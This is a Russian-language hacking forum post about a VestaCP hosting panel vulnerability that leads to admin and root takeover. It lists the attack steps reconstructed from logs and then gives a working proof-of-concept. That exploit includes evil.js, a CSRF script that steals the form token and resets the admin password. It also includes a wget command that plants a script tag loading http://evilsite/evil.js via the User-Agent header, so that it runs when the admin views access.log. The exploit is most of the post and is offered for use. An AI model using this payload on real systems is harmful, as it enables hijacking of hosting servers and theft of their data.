hack-anonim
Пользователь
hack-anonim
Пользователь
- 24 Окт 2015
- 572
- 316
В хостинговой панели VestaCP обнаружена уязвимость, который позволяет злоумышленнику получить админский доступ к панели (а дальше и рутовский к серверу).
Уязвимость базируется на сбросе пароля администратора.
Последовательность взлома (восстанавливалась по логам, что конкретно за баг, пока не афишируется):
- Сброс пароля admin (?, как? тут явно дыра, это не брут)
- Выставляется bash для admin, модифицируется крон от админа, в профиле меняется мыло на [email protected]
- Дальше доступ в панель и ssh от admin с новым паролем.
Код:
Poc Exploit
================
1.Подготовьте js файл (evil.js):
function csrfWithToken(url,hanimisToken,password){
$.get(url, function(gelen) {
$('body').append($(gelen));
$('form[id="vstobjects"]').css("display","none");
var token = $(hanimisToken).attr("token");
$('form[id="vstobjects"]').attr("action",url);
$('input[name="v_password"]').val(password);
$('form[id="vstobjects"]').submit();
});
};
//password = 1234567
csrfWithToken("/edit/user/?user=admin","#token","123456");
2. Сделайте Get-запрос с этим js-файлом:
wget --header="Accept: text/html" --user-agent="<script src='http://evilsite/evil.js'></script>" http://victimserver
3. Дожидаемся когда администратор прочитает access.log, что сделает инъекцию нашего evil.js
4. Логинимся с изменённым паролем:
http(s)://victim:8083/